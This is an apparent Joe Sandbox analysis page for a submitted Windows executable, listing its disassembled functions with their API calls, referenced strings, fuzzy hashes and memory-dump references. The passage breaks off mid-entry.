Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\4sfN3Gx1vO.exe
API String ID: 2506810119-3505091812
Opcode ID: 85266c84dfedaa20b5a7290546344e0bfc9e02bd7658e47d04f4e2feb068dd38
Instruction ID: eeee8538d5b81146783530cfec5b4309f3ba51fceb5c8e64b119fbbb5fd5db2b
Opcode Fuzzy Hash: 85266c84dfedaa20b5a7290546344e0bfc9e02bd7658e47d04f4e2feb068dd38
Instruction Fuzzy Hash: 5331BC75A00A58ABDB25DB9A9C84DDEBFFCFB95314F104166F8049B211D6708A80DB98

Function 0057C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0057C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0057C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005E1990,01585818), ref: 0057C395

Strings

0, xrefs: 0057C2DF

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 03565f18d6f4bf437eb29874ece6787541dfd90247eec257be14d44aeb22ef59
Instruction ID: 82bc2f369544b9245633c3bd4eff52f0b4197526ff05008ff2d93bf76aac84ee
Opcode Fuzzy Hash: 03565f18d6f4bf437eb29874ece6787541dfd90247eec257be14d44aeb22ef59
Instruction Fuzzy Hash: A1418E712043029FD720DF25E884B5ABFE4BF85320F14CA1DF9A9972D1D730A904EB62

Function 005A4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,005ACC08,00000000,?,?,?,?), ref: 005A44AA
GetWindowLongW.USER32 ref: 005A44C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 005A44D7

Strings

SysTreeView32, xrefs: 005A447C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 7d29528cef674264b84be62b0e111c28e55fdb622321f230796781f3db644e79
Instruction ID: 4873749e4507687ffc0272da20159f5b84f6073fe35ad84ddef6095fe723cada
Opcode Fuzzy Hash: 7d29528cef674264b84be62b0e111c28e55fdb622321f230796781f3db644e79
Instruction Fuzzy Hash: B9315C31210606AFDF219EB8DC45BEA7FA9FB8A334F204725F975921D0D7B0AC519B50

Function 00576E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00576EED
VariantCopyInd.OLEAUT32(?,?), ref: 00576F08
VariantClear.OLEAUT32(?), ref: 00576F12

Strings

*jW, xrefs: 00576E8B, 00576E90, 00576EF8

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *jW
API String ID: 2173805711-2693160286
Opcode ID: e222dacec7af85bcd0789438c73db7ac1fa2fcd13b4296e363e227b78d300cf1
Instruction ID: 44ee51ad280366b0a565b4ed83e78f19bbb2caa039ebc39a47f9f52f1951dfdd
Opcode Fuzzy Hash: e222dacec7af85bcd0789438c73db7ac1fa2fcd13b4296e363e227b78d300cf1
Instruction Fuzzy Hash: BB31B371604606DFDB04AF64F8949BD3F76FF85300B104898F9064B2A1D7309D91EBA4

Function 0059304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0059335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00593077,?,?), ref: 00593378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0059307A
_wcslen.LIBCMT ref: 0059309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00593106

Strings

255.255.255.255, xrefs: 00593095, 0059309A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 78dd40aee28c6856205b5010857949670ddff2b7c8a1631a27753eb08665188b
Instruction ID: b7988a32a94d354688cc7802369c09e2f709e1e9885909f3bd948fcabf683d35
Opcode Fuzzy Hash: 78dd40aee28c6856205b5010857949670ddff2b7c8a1631a27753eb08665188b
Instruction Fuzzy Hash: 2A31B039600202DFCB20CF68C589AAA7FE0FF55318F248459E9158B3A2DB32EE45D760

Function 005A4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 005A4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 005A4713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 005A471A

Strings

msctls_updown32, xrefs: 005A4684

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: b97b30fca7c9fa717f541dffe9d8cca0d32186fd61603e6af52a40dd884655f9
Instruction ID: c91d114d8811ffbe7e007e7097770fd6d48f963bac30f61831a6da48671c38db
Opcode Fuzzy Hash: b97b30fca7c9fa717f541dffe9d8cca0d32186fd61603e6af52a40dd884655f9
Instruction Fuzzy Hash: E72151B5600249AFDB10DF68DCC5DBB3BADFB9B394B040459FA019B261DB70EC51DA60

Function 005795AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0057961D

Strings

#notrayicon, xrefs: 005795B7
#requireadmin, xrefs: 005795D9
#OnAutoItStartRegister, xrefs: 005795F3

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: c7d286b08879fb0b6d8ae524f38049a7491f73f969b39a7e70e99d8c81f0c7ca
Instruction ID: cd10c6d01f152332f5155d5cf581eff24f34541b12618ff2b35ce0a908ff0897
Opcode Fuzzy Hash: c7d286b08879fb0b6d8ae524f38049a7491f73f969b39a7e70e99d8c81f0c7ca
Instruction Fuzzy Hash: 9921087210462266D331AA29AC06FBB7FACBFD5310F148426F94D97181EB51AD81E3F5

Function 005A37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 005A3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 005A3850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 005A3876

Strings

Listbox, xrefs: 005A380F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: ac3c9b42013912ca22de0ad213a1a1cf7f631d677117bae5d8fa9a5fb8b1e451
Instruction ID: 16ab0d73d7ec5fdddcefd8e1ad1e02aa67a76108507ea7a7b151b4ba6b84a5f6
Opcode Fuzzy Hash: ac3c9b42013912ca22de0ad213a1a1cf7f631d677117bae5d8fa9a5fb8b1e451
Instruction Fuzzy Hash: 3521BE72600219BBEB218F64CC85EBF3B6EFF8A754F108125F9009B190CA75DD528BA0

Function 005849F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00584A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00584A5C
SetErrorMode.KERNEL32(00000000,?,?,005ACC08), ref: 00584AD0

Strings

%lu, xrefs: 00584A6F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 68cff9678ffcb0c9caef91b0f2b0e22263f4b529ac0c212f710bf53590214787
Instruction ID: 0037eeb0ff125ed1899e4654c4d0db9e6e06dd6a80b791260e61ed13296bf692
Opcode Fuzzy Hash: 68cff9678ffcb0c9caef91b0f2b0e22263f4b529ac0c212f710bf53590214787
Instruction Fuzzy Hash: C7314B75A00209AFDB10DF54C885EAA7FF9FF49308F1480A5E909EB252DB71EE45CB61

Function 005A41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 005A424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 005A4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 005A4271

Strings

msctls_trackbar32, xrefs: 005A4226

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 8d912a7132a55813900e5a631ffeac11ee593ad80096fec63b8d9d7627b5ce59
Instruction ID: 641ec9e6f322ed538e558a8222291f584a4bb7f2c0851ce90431f072bffea93b
Opcode Fuzzy Hash: 8d912a7132a55813900e5a631ffeac11ee593ad80096fec63b8d9d7627b5ce59
Instruction Fuzzy Hash: 8011A331240248BEEF205E69CC46FAB3FACFFD6B54F110525FA55E6090D6B1DC519B50

Function 00572F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A

Part of subcall function 00572DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00572DC5
Part of subcall function 00572DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00572DD6
Part of subcall function 00572DA7: GetCurrentThreadId.KERNEL32 ref: 00572DDD
Part of subcall function 00572DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00572DE4

GetFocus.USER32 ref: 00572F78

Part of subcall function 00572DEE: GetParent.USER32(00000000), ref: 00572DF9

GetClassNameW.USER32(?,?,00000100), ref: 00572FC3
EnumChildWindows.USER32(?,0057303B), ref: 00572FEB

Strings

%s%d, xrefs: 00572FFF

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 7e13d4eee0aeb51ca3cd6c13c07e89be3ce19a6521083f4445ffc6e30d7a030b
Instruction ID: 0284a40ecf1a234bd9a447240347ce344aa19da3ef18e3bce9d07fb704a45c16
Opcode Fuzzy Hash: 7e13d4eee0aeb51ca3cd6c13c07e89be3ce19a6521083f4445ffc6e30d7a030b
Instruction Fuzzy Hash: 9D11A2716002066BDF14BF74AC89EED3F6ABFD5314F048075B90D9B292DE30994AAB60

Function 005A5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005A58C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005A58EE
DrawMenuBar.USER32(?), ref: 005A58FD

Strings

0, xrefs: 005A588F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 619f8348d8e64c93262a53a7eea57482402fb24acad13cdf8d54641735dec090
Instruction ID: c7d871573c25bb420818d4a14f52760362fc881f762fb8be5d11e86f48b69884
Opcode Fuzzy Hash: 619f8348d8e64c93262a53a7eea57482402fb24acad13cdf8d54641735dec090
Instruction Fuzzy Hash: FD010C31500219EEDB619F11E844FAFBFB8BF46361F1484A9F849DA151EB308A94EF21

Function 0056D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0056D3BF
FreeLibrary.KERNEL32 ref: 0056D3E5

Strings

GetSystemWow64DirectoryW, xrefs: 0056D3B9
X64, xrefs: 0056D2A8

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: e9d0d174f390c45b71d9cd920f70244f378d3083ec3cd8479706207018db8902
Instruction ID: 0b90b13ec85af04db34f9c90fd8d29fe54aa680639c52263857bdf243e7d459b
Opcode Fuzzy Hash: e9d0d174f390c45b71d9cd920f70244f378d3083ec3cd8479706207018db8902
Instruction Fuzzy Hash: CDF055B5F05A208BC77102115C2896D3FB0BF12701BA88D26E802EB244EB20CC44C2B2

Function 0057007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8578f3d0aac6b0e00a43cb10c0aa0e71d98254ee7c952f1ab8b223c4d1836df
Instruction ID: a66f30f55023ea489b0ddf1a63732a3597511ff16080eb6116a363c08c1efad8
Opcode Fuzzy Hash: e8578f3d0aac6b0e00a43cb10c0aa0e71d98254ee7c952f1ab8b223c4d1836df
Instruction Fuzzy Hash: 29C16D75A00216EFCB14CF94D898AAEBBF5FF48314F209598E509EB291D731DD41EB90

Function 0059342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00593459
CoUninitialize.OLE32 ref: 00593463
VariantInit.OLEAUT32(?), ref: 0059346E
VariantClear.OLEAUT32(?), ref: 0059371B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 60f024b417318b33880e3f4025eafc44358c8a7a8db3dd3ca70887c17f494415
Instruction ID: 668b0a821a1b4d8ff13a3f0aec4b6cc11244cac9605a81a188f9f9832a3beae0
Opcode Fuzzy Hash: 60f024b417318b33880e3f4025eafc44358c8a7a8db3dd3ca70887c17f494415
Instruction Fuzzy Hash: DFA14975204201DFDB10DF28C489A6ABBE5FF8D714F058859F98A9B362DB30EE45CB91

Function 00570436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,005AFC08,?), ref: 005705F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,005AFC08,?), ref: 00570608
CLSIDFromProgID.OLE32(?,?,00000000,005ACC40,000000FF,?,00000000,00000800,00000000,?,005AFC08,?), ref: 0057062D
_memcmp.LIBVCRUNTIME ref: 0057064E

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: cad1f59382c62924ea53cf19128c96f0ab7c43fe6dfb078b7315cadeade281ed
Instruction ID: 853643bb8abe0d859517d7a55ba91d36adbb0d36eb3dce13e5160036971bdeca
Opcode Fuzzy Hash: cad1f59382c62924ea53cf19128c96f0ab7c43fe6dfb078b7315cadeade281ed
Instruction Fuzzy Hash: 27811C71A00109EFCB04DF94C988DEEBBF9FF89315F108558E506AB290DB71AE06DB60

Function 00551391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 005514C0

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 26761c60a35de7da804ddc60fd3569eb2d525dcb7c1e48995331b88ae76008bc
Instruction ID: 45c1923008adaf492b3dc735f0795fb6801f190f85a5fd9c959c5b60691cc93d
Opcode Fuzzy Hash: 26761c60a35de7da804ddc60fd3569eb2d525dcb7c1e48995331b88ae76008bc
Instruction Fuzzy Hash: 1B416935A00902EBDF216BB98C5ABAF3FA4FF81371F140627FC19C6192F67448495765

Function 005A6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0158E690,?), ref: 005A62E2
ScreenToClient.USER32(?,?), ref: 005A6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 005A6382

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 52ec338d578cd0c20444c3495194bd77716a393a8eaf88a09e74580a5eab00b8
Instruction ID: 1750203f7b1eaf19aaf35c07f46c79752b1c70fb1ba27bb79646e6d86bf0eadb
Opcode Fuzzy Hash: 52ec338d578cd0c20444c3495194bd77716a393a8eaf88a09e74580a5eab00b8
Instruction Fuzzy Hash: 2D514A74A00249EFCF14DF68D880AAE7BB5FF96360F14856AF8159B290D730ED81DB90

Function 00591AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00591AFD
WSAGetLastError.WSOCK32 ref: 00591B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00591B8A
WSAGetLastError.WSOCK32 ref: 00591B94

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
